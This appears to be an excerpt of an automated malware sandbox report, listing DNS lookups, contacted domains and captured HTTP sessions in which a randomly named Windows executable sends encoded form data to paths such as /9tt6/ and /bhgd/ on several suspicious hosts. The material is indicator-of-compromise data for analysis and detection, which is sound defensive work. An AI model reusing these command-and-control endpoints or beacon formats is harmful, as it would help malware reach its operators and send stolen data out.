                                                          Jan 10, 2025 23:07:25.742908955 CET1.1.1.1192.168.2.90xdfd0No error (0)www.autonomousoid.pro76.223.54.146A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:07:39.376694918 CET1.1.1.1192.168.2.90x5f58No error (0)www.rpa.asia160.25.166.123A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:07:53.088196993 CET1.1.1.1192.168.2.90xc101No error (0)www.pitaloka.xyz68.66.226.119A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.einpisalpace.shop
                                                          • www.deacapalla.online
                                                          • www.unlimitu.website
                                                          • www.dejikenkyu.cyou
                                                          • www.031233226.xyz
                                                          • www.grimbo.boats
                                                          • www.autonomousoid.pro
                                                          • www.rpa.asia
                                                          • www.pitaloka.xyz

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.949974188.114.97.3805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:05:39.621166945 CET486OUTGET /2jc0/?bdi02je=02ITxlk7k5y73RXcEgyHf9eN5gBctaG4x5Z2Hm75JBt4EXaberRL5XNENm6Llqf4eDkRLvOACOcTLUte5cKTzLCIux+gwKEOB3rpq+QpBMz0/Iw+6w==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.einpisalpace.shop
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:05:40.617919922 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:05:40 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zHYkuChScjLcDK5ZwtnlnP2Kf6lNJjPQ7dvVf1pIG9awHfbKteh0uzwzQfpDXwJ6zvz%2F9KWVyiCWZwQlyg63i6EeuJX8n3hXMNEJ2OKHe5L017ynYeY4KHs5YP1w1AsmCS10fx0BQhc%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff8443d1fc3ee-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1514&rtt_var=757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=486&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 35 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                          Data Ascii: 591<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css">
                                                          Jan 10, 2025 23:05:40.617949963 CET1048INData Raw: 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d
                                                          Data Ascii: body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spac


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.949976208.91.197.27805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:05:56.105657101 CET760OUTPOST /9tt6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deacapalla.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.deacapalla.online
                                                          Referer: http://www.deacapalla.online/9tt6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 63 31 4c 4a 74 6a 51 44 6b 7a 42 73 7a 54 33 72 58 4b 50 73 77 31 71 79 38 74 41 6f 57 48 59 68 39 70 59 6c 41 4d 61 71 6d 50 69 49 72 5a 55 33 56 74 2b 42 4c 74 6d 43 6f 34 39 69 6f 61 37 39 7a 75 38 30 72 4b 74 58 6f 56 70 70 4a 72 67 71 69 4c 6d 4a 6c 72 34 2b 39 4a 54 4b 52 68 31 50 57 43 32 48 63 42 4d 76 73 56 6f 31 41 35 44 57 34 6b 76 47 73 31 4c 33 4f 41 6a 66 36 6c 4a 35 6c 34 71 38 4e 33 44 47 2b 68 4c 46 38 75 69 78 31 59 51 42 6d 4b 49 39 51 69 36 67 51 70 5a 61 77 43 77 5a 69 6a 6e 76 74 4b 67 77 6d 68 76 4a 56 63 78 31 66 78 6e 76 76 55 6f 35
                                                          Data Ascii: bdi02je=c1LJtjQDkzBszT3rXKPsw1qy8tAoWHYh9pYlAMaqmPiIrZU3Vt+BLtmCo49ioa79zu80rKtXoVppJrgqiLmJlr4+9JTKRh1PWC2HcBMvsVo1A5DW4kvGs1L3OAjf6lJ5l4q8N3DG+hLF8uix1YQBmKI9Qi6gQpZawCwZijnvtKgwmhvJVcx1fxnvvUo5


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.949977208.91.197.27805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:05:58.725145102 CET784OUTPOST /9tt6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deacapalla.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.deacapalla.online
                                                          Referer: http://www.deacapalla.online/9tt6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 63 31 4c 4a 74 6a 51 44 6b 7a 42 73 68 6a 48 72 52 70 58 73 68 46 71 39 67 39 41 6f 45 48 59 39 39 70 55 6c 41 4a 36 45 6d 36 36 49 72 38 51 33 55 70 4b 42 59 64 6d 43 67 59 39 6e 33 71 37 30 7a 76 42 4c 72 4c 68 58 6f 56 39 70 4a 70 34 71 69 64 75 4b 71 62 34 38 77 70 54 45 4f 78 31 50 57 43 32 48 63 42 49 46 73 56 41 31 41 70 54 57 71 57 4c 46 74 31 4c 32 5a 77 6a 66 77 46 4a 39 6c 34 71 53 4e 32 50 73 2b 6a 7a 46 38 76 53 78 31 4a 51 43 78 61 49 7a 50 79 37 7a 58 63 73 75 70 79 77 68 69 6a 2f 58 31 5a 49 4c 68 41 54 58 45 75 34 75 4b 6d 6e 49 6f 7a 68 52 45 68 74 6f 73 31 6b 52 66 32 65 46 4b 38 49 4f 59 70 46 4d 48 67 3d 3d
                                                          Data Ascii: bdi02je=c1LJtjQDkzBshjHrRpXshFq9g9AoEHY99pUlAJ6Em66Ir8Q3UpKBYdmCgY9n3q70zvBLrLhXoV9pJp4qiduKqb48wpTEOx1PWC2HcBIFsVA1ApTWqWLFt1L2ZwjfwFJ9l4qSN2Ps+jzF8vSx1JQCxaIzPy7zXcsupywhij/X1ZILhATXEu4uKmnIozhREhtos1kRf2eFK8IOYpFMHg==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.949978208.91.197.27805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:01.310235023 CET1797OUTPOST /9tt6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deacapalla.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.deacapalla.online
                                                          Referer: http://www.deacapalla.online/9tt6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 63 31 4c 4a 74 6a 51 44 6b 7a 42 73 68 6a 48 72 52 70 58 73 68 46 71 39 67 39 41 6f 45 48 59 39 39 70 55 6c 41 4a 36 45 6d 36 79 49 72 4b 73 33 53 49 4b 42 62 64 6d 43 71 34 39 6d 33 71 36 32 7a 76 5a 50 72 4c 39 48 6f 57 46 70 47 73 6b 71 7a 59 4f 4b 39 72 34 38 35 4a 54 4a 52 68 31 2f 57 43 6e 41 63 41 34 46 73 56 41 31 41 76 33 57 6f 45 76 46 67 56 4c 33 4f 41 6a 62 36 6c 4a 56 6c 34 79 6b 4e 32 62 57 2b 58 48 46 39 50 43 78 79 37 49 43 75 71 49 6d 4d 79 36 30 58 63 6f 78 70 79 73 44 69 6a 4c 35 31 5a 67 4c 69 6b 48 4e 51 2f 34 45 57 32 58 71 6d 44 56 79 4b 6e 6c 41 6a 57 70 43 65 6d 7a 2f 55 4a 78 33 5a 4a 41 39 64 67 4c 4a 67 4e 63 6c 73 4f 75 6e 5a 76 6b 34 66 62 6c 6e 4f 6c 73 6d 74 4e 6b 35 58 61 74 77 52 47 77 49 4a 37 7a 34 31 64 6c 72 4c 45 37 39 6e 45 4d 56 4a 4a 51 52 68 30 4d 73 48 33 47 32 56 35 4c 6d 54 59 71 2f 6c 63 39 62 31 76 53 66 48 58 70 62 35 67 45 35 6b 4a 57 34 75 59 75 4e 33 72 4d 44 7a 6a 2b 69 50 6f 7a 57 66 4f 65 78 77 44 6a 4a 44 2f 41 7a 4d 64 [TRUNCATED]
                                                          Data Ascii: bdi02je=c1LJtjQDkzBshjHrRpXshFq9g9AoEHY99pUlAJ6Em6yIrKs3SIKBbdmCq49m3q62zvZPrL9HoWFpGskqzYOK9r485JTJRh1/WCnAcA4FsVA1Av3WoEvFgVL3OAjb6lJVl4ykN2bW+XHF9PCxy7ICuqImMy60XcoxpysDijL51ZgLikHNQ/4EW2XqmDVyKnlAjWpCemz/UJx3ZJA9dgLJgNclsOunZvk4fblnOlsmtNk5XatwRGwIJ7z41dlrLE79nEMVJJQRh0MsH3G2V5LmTYq/lc9b1vSfHXpb5gE5kJW4uYuN3rMDzj+iPozWfOexwDjJD/AzMdwZH7HCpUyzKTyqQ+QiOPCVswxLUAAE3fFoIXVyThNa9l0Uf8WLr3erBs/x+g1p1Oe8pLzbKAfULfPELT/KLkyVpAGE7l+oB3PjL8bWQJdq9JvBOa9Y2yWybcHQ+cDTjIExW13xMlgYaWVlAIBO9+aESy5HYQp5414dEsbduPD0td/Nh4C3K2coX3VNKOpeq+tR+GNAwB++UkBbCVdrCw4kGmVPgdbLl32UN7BZFeZAaUGnp+pM5OxXeakXnWwtwtRUFhWMh5ANrBuqvQWDvsDjY40K5KDO/aWytDTGrUTk2yy1/pk22CQTbpFA7v0anZcLTrL7fufq/mFVSnj8KO24lV2nN7aZ5gVcyqdm8e7h0V2jb0ZLSv7rcwXJ18kxsOLkIded4u4P/lzTJERkB7EDZtt34NhbogP1gNwxmla/JxkD/oP4pXyMkAO6c7wuvQzzsY1x5/si9oemNzZKQcFFGTQeOfxRrSt7zZuPkl++h9HEVAGcj1OpTa6IraQxYIsawyiagbRl1SNapwNNkNHmu8VQOfn6W0IdyEEygbiv9AtXjoLw8qARBjLfXqDk4oLJXddN/Uf/v4pBRQF2mUK1ha4m0umxmGKHWYZjnY+vMA1MbWkPkmTZzEWoqRuG86CmUCYJTZmmSm6OSMkaIt2lOWQv8rKJMrDn [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.949979208.91.197.27805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:03.855287075 CET486OUTGET /9tt6/?bdi02je=R3jpuUkZ7EJX4jqjTcmTvUqnmsYgEhE9uoYGKZnTkeq/io5yCJ6WA6X9pqF204rzk7Rku8NUjH1PNJ500I+1+upb+vrNHTsmBA3bSTQzlk0fY+b/7g==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.deacapalla.online
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:06:04.680166006 CET1236INHTTP/1.1 200 OK
                                                          Date: Fri, 10 Jan 2025 22:06:03 GMT
                                                          Server: Apache
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                          Set-Cookie: vsid=911vr4840923640944995; expires=Wed, 09-Jan-2030 22:06:04 GMT; Max-Age=157680000; path=/; domain=www.deacapalla.online; HttpOnly
                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_baOlHDzM5B09cBIdTNk3ddT6tLW4o5ks1EZkdtDKuJ+aj4r+2XJas+lzB10vAMs+8kEcT7aZsrEKwWDtQz8vbA==
                                                          Content-Length: 2613
                                                          Content-Type: text/html; charset=UTF-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 62 61 4f 6c 48 44 7a 4d 35 42 30 39 63 42 49 64 54 4e 6b 33 64 64 54 36 74 4c 57 34 6f 35 6b 73 31 45 5a 6b 64 74 44 4b 75 4a 2b 61 6a 34 72 2b 32 58 4a 61 73 2b 6c 7a 42 31 30 76 41 4d 73 2b 38 6b 45 63 54 37 61 5a 73 72 45 4b 77
                                                          Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_baOlHDzM5B09cBIdTNk3ddT6tLW4o5ks1EZkdtDKuJ+aj4r+2XJas+lzB10vAMs+8kEcT7aZsrEKw
                                                          Jan 10, 2025 23:06:04.680180073 CET1236INData Raw: 57 44 74 51 7a 38 76 62 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                                          Data Ascii: WDtQz8vbA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=1"></script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=2"></script><script
                                                          Jan 10, 2025 23:06:04.680191040 CET1131INData Raw: 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0d 0a 20
                                                          Data Ascii: "NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-wid


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.949980209.74.79.40805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:09.734184027 CET757OUTPOST /bhgd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.unlimitu.website
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.unlimitu.website
                                                          Referer: http://www.unlimitu.website/bhgd/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 4f 79 61 7a 4c 52 50 39 5a 57 78 74 4a 41 31 30 42 2b 44 65 39 6f 74 32 6c 57 62 39 4c 6d 55 78 6d 57 49 6a 71 70 58 79 58 38 2f 72 64 57 48 38 52 74 43 57 35 41 72 5a 45 39 59 5a 68 47 38 53 6c 33 49 65 45 4b 42 64 42 4c 56 52 44 5a 61 6f 6a 46 31 52 79 73 45 34 46 6a 37 6f 49 65 5a 44 2f 53 31 4e 51 41 42 34 47 2f 65 39 59 53 35 44 57 2f 64 42 66 6d 74 2f 43 71 79 78 4c 76 6b 71 4e 66 36 52 50 44 74 5a 43 33 57 30 56 54 6d 55 7a 33 43 77 5a 56 7a 54 7a 5a 42 65 54 6b 50 63 4c 39 48 42 39 5a 6c 46 71 32 71 62 67 43 5a 59 71 6f 57 36 62 44 54 74 6c 45 44 6f
                                                          Data Ascii: bdi02je=OyazLRP9ZWxtJA10B+De9ot2lWb9LmUxmWIjqpXyX8/rdWH8RtCW5ArZE9YZhG8Sl3IeEKBdBLVRDZaojF1RysE4Fj7oIeZD/S1NQAB4G/e9YS5DW/dBfmt/CqyxLvkqNf6RPDtZC3W0VTmUz3CwZVzTzZBeTkPcL9HB9ZlFq2qbgCZYqoW6bDTtlEDo
                                                          Jan 10, 2025 23:06:10.322408915 CET533INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:10 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.949981209.74.79.40805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:12.294816971 CET781OUTPOST /bhgd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.unlimitu.website
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.unlimitu.website
                                                          Referer: http://www.unlimitu.website/bhgd/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 4f 79 61 7a 4c 52 50 39 5a 57 78 74 49 6a 74 30 4e 39 72 65 31 6f 74 78 70 32 62 39 51 57 55 39 6d 57 4d 6a 71 74 50 69 58 50 58 72 64 7a 37 38 53 73 43 57 30 67 72 5a 50 64 59 59 2b 57 38 5a 6c 33 30 57 45 4c 39 64 42 4c 42 52 44 62 53 6f 69 79 5a 65 7a 38 45 36 63 54 37 71 48 2b 5a 44 2f 53 31 4e 51 41 56 42 47 2f 47 39 59 42 52 44 58 65 64 65 42 57 74 38 56 61 79 78 63 66 6b 6d 4e 66 36 2f 50 43 42 2f 43 31 2b 30 56 53 57 55 7a 6a 57 7a 57 56 7a 5a 2b 35 41 76 53 6d 2b 69 4e 39 4f 64 32 36 70 5a 2b 45 75 62 6a 6a 6c 47 37 61 66 68 4f 55 54 4b 69 6a 4b 41 33 63 39 4e 30 79 37 61 55 4a 41 51 7a 65 39 68 37 69 50 65 35 77 3d 3d
                                                          Data Ascii: bdi02je=OyazLRP9ZWxtIjt0N9re1otxp2b9QWU9mWMjqtPiXPXrdz78SsCW0grZPdYY+W8Zl30WEL9dBLBRDbSoiyZez8E6cT7qH+ZD/S1NQAVBG/G9YBRDXedeBWt8VayxcfkmNf6/PCB/C1+0VSWUzjWzWVzZ+5AvSm+iN9Od26pZ+EubjjlG7afhOUTKijKA3c9N0y7aUJAQze9h7iPe5w==
                                                          Jan 10, 2025 23:06:12.865439892 CET533INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:12 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
